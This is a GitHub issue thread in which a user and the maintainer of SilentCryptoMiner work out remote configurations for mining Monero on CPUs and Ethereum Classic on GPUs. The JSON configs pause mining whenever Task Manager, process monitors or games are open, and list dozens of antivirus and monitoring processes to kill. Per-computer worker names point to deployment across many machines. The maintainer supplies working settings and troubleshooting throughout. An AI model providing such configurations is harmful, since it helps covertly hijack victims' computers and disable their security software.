### ISSUE TITLE
Configuration

### ISSUE THREAD

**Issue by tarekxxx** [UnamSanctam/SilentCryptoMiner#1165]
Need Configuration IF i need open XMR and GPU mining in same time i use oceanminer ! what good website for etc mining and low payout ? and how settings will be look like ?

**Comment by UnamSanctam** [comment]
Not fully sure what you're requesting, are you asking for a configuration for an already running miner ("Remote Configuration" or web panel "Configurations") or a miner you're going to build in the builder?

**Comment by tarekxxx** [comment]
i mean as remote configuration mining CPU and GPU in same time  ?

**Comment by UnamSanctam** [comment]
You can't enable "GPU Mining" in the XMR miner with the "Remote Configuration" if that's what you mean because if you didn't enable that in the builder then it doesn't compile together with then GPU libraries (because they are very large). Or are you asking for an ETC configuration in the ETH miner? For an ETC pool 2miners is quite good (which is why I use it in the example settings).

**Comment by tarekxxx** [comment]
no i mean CPU mining for xmr and GPU for ETC !!  and also ask for etc configuration for example 2miners 
and yea i will open GPU mining Button to ON and need mining both XMR for CPU + GPU for ETC !

**Comment by tarekxxx** [comment]
need example like this 
for Both CPU and GPU mining in same time 

this for XMR only i need something like this for ETC with enabled Button on GPU mining !
{
    "algo": "rx/0",
    "pool": "gulf.moneroocean.stream",
    "port": 443,
    "wallet": "8",
    "password": "Mody~ghostrider",
    "ssltls": true,
    "max-cpu": 0,
    "idle-wait": 1,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,regedit.exe,MRT.exe",
    "api-endpoint": ""
}

**Comment by UnamSanctam** [comment]
MoneroOcean has added ETC mining if you want to try that, the configuration for the ETC miner would be:
```
{
    "url": "stratums://WALLET.x:1~etchash@gulf.moneroocean.stream:20256",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 5,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe",
    "kill-targets": ""
}
```
And replace `WALLET` with your XMR wallet address. Otherwise you can also try other pools like 2miners. ETC does not have a "GPU Mining" option because it always mines with the GPU, in the builder it is a different miner than XMR so the options are different as well. If you did not build the miner with an ETH/ETC miner selected then you don't have an ETC miner inside of your build.

**Comment by tarekxxx** [comment]
UserName Can Become {COMPUTERNAME} ? and where password ?  Wallet,X what this X Mean ? password ?

**Comment by UnamSanctam** [comment]
You can change the worker name to the computer name sure, `1~etchash` is the password there. The X is the normal location for the worker name but MoneroOcean doesn't use that. So change `1~etchash` to `{COMPUTERNAME}~etchash` if you want to use the computer name as the worker name.

**Comment by tarekxxx** [comment]
so when Both  working it will become like this config ?

XMR
{
	"algo": "rx/0",
	"pool": "gulf.moneroocean.stream",
	"port": 443,
	"wallet": "WALLET",
	"password": "{COMPUTERNAME}~ghostrider",
	"ssltls": true,
	"max-cpu": 20,
	"idle-wait": 1,
	"idle-cpu": 80,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,regedit.exe,MRT.exe",
	"api-endpoint": ""
}
{
    "url": "stratums://WALLET.x:1~etchash@gulf.moneroocean.stream:20256",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 5,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe",
    "kill-targets": ""
}
Right ?

**Comment by UnamSanctam** [comment]
ETC is another miner, so you would use another "Remote Configuration" for the ETC miner. If you didn't build the miner with an ETC/ETH miner then you don't have any ETC code inside your miner.

**Comment by tarekxxx** [comment]
aha cool Unam Like always you Amazing !

**Comment by tarekxxx** [comment]
I GOT Another Problem while Compining 
![Screenshot 2022-09-13 220955](https://user-images.githubusercontent.com/20240556/189999653-84a895c7-72cc-4ed6-96d6-865d20c7f7aa.png)

Logs 
cc1plus.exe: out of memory allocating 2147487743 bytes

**Comment by UnamSanctam** [comment]
Yes it's a bug with XMR "GPU Mining", but you shouldn't have that enabled if you're going to mine ETC. It should be like the example settings https://github.com/UnamSanctam/SilentCryptoMiner/wiki#lite.

**Comment by tarekxxx** [comment]
inside XMR Field i DO GPU mining Disabled !

**Comment by UnamSanctam** [comment]
Yes because you don't want to mine XMR with the GPU, only ETC.

**Comment by tarekxxx** [comment]
this correct ? 
![Screenshot (21)](https://user-images.githubusercontent.com/20240556/190001751-d5f2ffed-49ca-4cfa-916c-30233ff12d48.png)

and did pool will convert ETC to XMr and sent to my wallet or how i can see my ETC in this moneroocean ?

**Comment by UnamSanctam** [comment]
You should put `{COMPUTERNAME}~etchash` inside the "Password" field and not the "Worker Name" field, otherwise it's correct. MoneroOcean converts everything you mine to XMR, it will show the converted hashrate on your MoneroOcean. You can also change the port to 443 if you want.

**Comment by tarekxxx** [comment]
like this ?
{
    "url": "stratums://wallet.x:{COMPUTERNAME}~etchash@gulf.moneroocean.stream:443",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 5,
    "idle-gpu": 100,
    "stealth-targets":

**Comment by UnamSanctam** [comment]
Yes exactly.

**Comment by tarekxxx** [comment]
ETC NOT WORKING UNTIL NOW 
 "url": "stratums://WALLET.COMPUTERNAME}~etchash:@gulf.moneroocean.stream:443",
???

**Comment by tarekxxx** [comment]
or like this 
"url": "stratums://0xa798131114ffc9d25cb341d3d404dfea24647443.{COMPUTERNAME}~etchash@gulf.moneroocean.stream:443",

**Comment by tarekxxx** [comment]
XMR and ETC on port 443 but 100% my configration online is have something wrong unam not working at all

**Comment by tarekxxx** [comment]
only working XMR hashrate how i can found ETC hashrate ?

**Comment by UnamSanctam** [comment]
It should be like this:
```
stratums://wallet:{COMPUTERNAME}~etchash@gulf.moneroocean.stream:443
```
On MoneroOcean they will show both your XMR and ETC hashrates combined.

**Comment by tarekxxx** [comment]
Unam Last Thing Please How i Can Double Check ETC working while XMR running Also How Double Check On ETC is Mining ?

**Comment by UnamSanctam** [comment]
You can change the ETC miners worker name from `{COMPUTERNAME}` to `ETC` and then the `ETC` worker should appear after a while (can take some time for statistics). You can also probably tell from the hashrate since ETC will be a huge amount of hashrate converted into the XMR equivalent.

**Comment by tarekxxx** [comment]
I Do But Not Appear ! at all ETC worker !

**Comment by UnamSanctam** [comment]
Run the checker and post what it says here.

**Comment by tarekxxx** [comment]
![Screenshot (22)](https://user-images.githubusercontent.com/20240556/190271008-5be8bdb4-4f8b-4562-86a8-04bf73649e6d.png)
here !

**Comment by UnamSanctam** [comment]
You didn't change the worker name to ETC, and you also put it in the wrong field. You should put `ETC~etchash` inside the password field and not the worker name field.

**Comment by tarekxxx** [comment]
i Do bymistake in Program Config pastebin config will not active and repair this syntax ? as connected ? or must reinstall new Miner with changes ?

**Comment by UnamSanctam** [comment]
Hmm, I'm not sure.

**Comment by tarekxxx** [comment]
i  tryed alot without XMR only ETC but Not working at all

**Comment by UnamSanctam** [comment]
You need to enter the XMR wallet address and not an ETC one if you haven't done that.

**Comment by tarekxxx** [comment]
XMR wallet not ETC ???? in ETC Mining ???

**Comment by UnamSanctam** [comment]
You are mining to MoneroOcean which converts everything you mine into XMR, so they use XMR wallets. If you want ETC when mining then you'll have to use another pool like 2miners.

**Comment by tarekxxx** [comment]
no iam cool with thi moneroocean okay i replace wallet ETC to XMR i hope i get result !

**Comment by tarekxxx** [comment]
Ohhh Finallly LOL thanks so much Bro
